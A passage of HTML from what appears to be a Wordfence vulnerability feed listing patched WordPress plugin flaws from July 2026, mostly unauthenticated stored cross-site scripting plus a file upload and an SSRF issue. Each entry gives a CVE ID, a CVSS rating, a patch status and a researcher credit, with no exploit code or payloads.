<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5b0c8edd-b392-4d23-bde3-0521eeedc5a0" target="_blank" rel="noopener">Easy Digital Downloads &lt;= 3.6.9 &#8211; Authenticated (Shop Manager+) Arbitrary File Upload via &#8216;edd-import-file&#8217; Parameter</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-12476" target="_blank" rel="noopener noreferrer">							CVE-2026-12476						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/easy-digital-downloads" target="_blank" rel="noopener">Easy Digital Downloads – eCommerce Payments and Subscriptions made easy</a> <span class="wfvr-software-slug">[easy-digital-downloads]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/tal-kantor" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/1c4391be2148aea7fca24075cd6c4c20.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="1c4391be2148aea7fca24075cd6c4c20"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/tal-kantor" target="_blank" rel="noopener">Tal Kantor</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5b0c8edd-b392-4d23-bde3-0521eeedc5a0" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/52784505-a408-414f-a793-262d24f36546" target="_blank" rel="noopener">Easy PayPal &amp; Stripe Buy Now Button &lt;= 2.0.4 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65517" target="_blank" rel="noopener noreferrer">							CVE-2026-65517						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-ecommerce-paypal" target="_blank" rel="noopener">Easy PayPal &amp; Stripe Buy Now Button</a> <span class="wfvr-software-slug">[wp-ecommerce-paypal]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/52784505-a408-414f-a793-262d24f36546" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/635e19ba-da98-459c-ab91-ff969b0812fd" target="_blank" rel="noopener">Fluent Forms &lt;= 6.2.7 &#8211; Unauthenticated Stored Cross-Site Scripting via Name Field Nested `password` Member</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-16655" target="_blank" rel="noopener noreferrer">							CVE-2026-16655						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/fluentform" target="_blank" rel="noopener">Fluent Forms – Customizable Contact Forms, Survey, Quiz, &amp; Conversational Form Builder</a> <span class="wfvr-software-slug">[fluentform]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/7965cd13376a540548ec7009cd66b05b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7965cd13376a540548ec7009cd66b05b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener">daroo</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/635e19ba-da98-459c-ab91-ff969b0812fd" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/82f5456e-f2cc-47f3-a957-f85d26834031" target="_blank" rel="noopener">FormCraft &lt;= 3.9.15 &#8211; Unauthenticated Server-Side Request Forgery</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65442" target="_blank" rel="noopener noreferrer">							CVE-2026-65442						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/formcraft" target="_blank" rel="noopener">FormCraft</a> <span class="wfvr-software-slug">[formcraft]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/luc" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/luc" target="_blank" rel="noopener">luc</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/82f5456e-f2cc-47f3-a957-f85d26834031" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/aa1bac80-4927-4fee-942c-c23d51b18abd" target="_blank" rel="noopener">GetGenie &lt;= 4.4.3 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65440" target="_blank" rel="noopener noreferrer">							CVE-2026-65440						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/getgenie" target="_blank" rel="noopener">GetGenie – AI SEO Assistant &amp; Content Writer with Keyword Research, AEO &amp; GEO</a> <span class="wfvr-software-slug">[getgenie]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/7965cd13376a540548ec7009cd66b05b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7965cd13376a540548ec7009cd66b05b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener">daroo</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/aa1bac80-4927-4fee-942c-c23d51b18abd" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/82ff0450-5a76-453e-bb27-45c11fff7419" target="_blank" rel="noopener">GiveWP – Donation Plugin and Fundraising Platform &lt;= 4.16.5 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66690" target="_blank" rel="noopener noreferrer">							CVE-2026-66690						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/give" target="_blank" rel="noopener">GiveWP – Donation Plugin and Fundraising Platform</a> <span class="wfvr-software-slug">[give]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/abdullah-kareem-cyberkareem" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4f2a3b32ba525d9a6cd33a222b91f5ec.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4f2a3b32ba525d9a6cd33a222b91f5ec"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/abdullah-kareem-cyberkareem" target="_blank" rel="noopener">Abdullah Kareem &#8220;cyberkareem&#8221;</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/82ff0450-5a76-453e-bb27-45c11fff7419" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8a106ebb-f3ec-4995-9717-358b91d468b4" target="_blank" rel="noopener">GiveWP &lt;= 4.16.3 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65441" target="_blank" rel="noopener noreferrer">							CVE-2026-65441						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/give" target="_blank" rel="noopener">GiveWP – Donation Plugin and Fundraising Platform</a> <span class="wfvr-software-slug">[give]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/luc" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/luc" target="_blank" rel="noopener">luc</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8a106ebb-f3ec-4995-9717-358b91d468b4" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/03542812-b6e5-421d-9ba6-43f1c779940f" target="_blank" rel="noopener">GTM4WP &lt;= 1.22.3 &#8211; Unauthenticated Stored Cross-Site Scripting via WooCommerce Billing Fields</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-16597" target="_blank" rel="noopener noreferrer">							CVE-2026-16597						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/duracelltomi-google-tag-manager" target="_blank" rel="noopener">GTM4WP – A Google Tag Manager (GTM) plugin for WordPress</a> <span class="wfvr-software-slug">[duracelltomi-google-tag-manager]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ly-hoang" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/f8da36de0b16927a052e4eb0878abbfb.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f8da36de0b16927a052e4eb0878abbfb"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ly-hoang" target="_blank" rel="noopener">lhking</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/03542812-b6e5-421d-9ba6-43f1c779940f" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e1c16bcb-c188-4e01-9d0b-e4e1a1ef82ee" target="_blank" rel="noopener">HBook &lt;= 2.1.9 &#8211; Unauthenticated Stored Cross-Site Scripting via Multiple Parameters</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-8143" target="_blank" rel="noopener noreferrer">							CVE-2026-8143						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 29, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/hbook-2" target="_blank" rel="noopener">HBook &#8211; Hotel booking system &#8211; WordPress Plugin</a> <span class="wfvr-software-slug">[hbook]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-ba-hung" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/64a0165f9a088bbcf2fc9efe7719419b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="64a0165f9a088bbcf2fc9efe7719419b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-ba-hung" target="_blank" rel="noopener">bashu</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e1c16bcb-c188-4e01-9d0b-e4e1a1ef82ee" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/106fd83b-2ab0-4fcf-8c73-ba18ba9dbe56" target="_blank" rel="noopener">Kali Forms &lt;= 2.4.18 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65446" target="_blank" rel="noopener noreferrer">							CVE-2026-65446						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/kali-forms" target="_blank" rel="noopener">Kali Forms — Contact Form &amp; Drag-and-Drop Builder</a> <span class="wfvr-software-slug">[kali-forms]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/106fd83b-2ab0-4fcf-8c73-ba18ba9dbe56" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c3d2425e-69e5-4efe-bbc6-0ef121e74341" target="_blank" rel="noopener">MailChimp Subscribe Form, Optin Builder, PopUp Builder, Form Builder &lt;= 4.3.3 &#8211; Unauthenticated Stored Cross-Site Scripting via Form Field Values</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15052" target="_blank" rel="noopener noreferrer">							CVE-2026-15052						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mailchimp-subscribe-sm" target="_blank" rel="noopener">MailChimp Subscribe Form, Optin Builder, PopUp Builder, Form Builder</a> <span class="wfvr-software-slug">[mailchimp-subscribe-sm]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/makka-pakka" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/340785ad53a1d99fd1554ac3f88bf112.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="340785ad53a1d99fd1554ac3f88bf112"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/makka-pakka" target="_blank" rel="noopener">she11f</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c3d2425e-69e5-4efe-bbc6-0ef121e74341" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3604b314-6b85-4d11-aa71-63f9198dbbdb" target="_blank" rel="noopener">Message Filter for Contact Form 7 &lt;= 1.6.3.9 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65438" target="_blank" rel="noopener noreferrer">							CVE-2026-65438						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/cf7-message-filter" target="_blank" rel="noopener">Message Filter for Contact Form 7</a> <span class="wfvr-software-slug">[cf7-message-filter]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dutafi" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4e130f207b6dc84614b81d6d7fd4b475.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4e130f207b6dc84614b81d6d7fd4b475"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dutafi" target="_blank" rel="noopener">dutafi</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3604b314-6b85-4d11-aa71-63f9198dbbdb" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3b0e83af-5abd-4b6e-b606-850c03b05036" target="_blank" rel="noopener">Meta for WooCommerce &lt;= 3.7.5 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66707" target="_blank" rel="noopener noreferrer">							CVE-2026-66707						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/facebook-for-woocommerce" target="_blank" rel="noopener">Meta for WooCommerce</a> <span class="wfvr-software-slug">[facebook-for-woocommerce]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/rafie-muhammad" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/bdcb43576544351fa89720015a32ba9b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="bdcb43576544351fa89720015a32ba9b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/rafie-muhammad" target="_blank" rel="noopener">Rafie Muhammad</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3b0e83af-5abd-4b6e-b606-850c03b05036" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b0c12678-1d91-4916-aa11-20292d9e384b" target="_blank" rel="noopener">Meta pixel for WordPress &lt;= 5.2.1 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66705" target="_blank" rel="noopener noreferrer">							CVE-2026-66705						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/official-facebook-pixel" target="_blank" rel="noopener">Meta pixel for WordPress</a> <span class="wfvr-software-slug">[official-facebook-pixel]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/rafie-muhammad" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/bdcb43576544351fa89720015a32ba9b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="bdcb43576544351fa89720015a32ba9b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/rafie-muhammad" target="_blank" rel="noopener">Rafie Muhammad</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b0c12678-1d91-4916-aa11-20292d9e384b" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
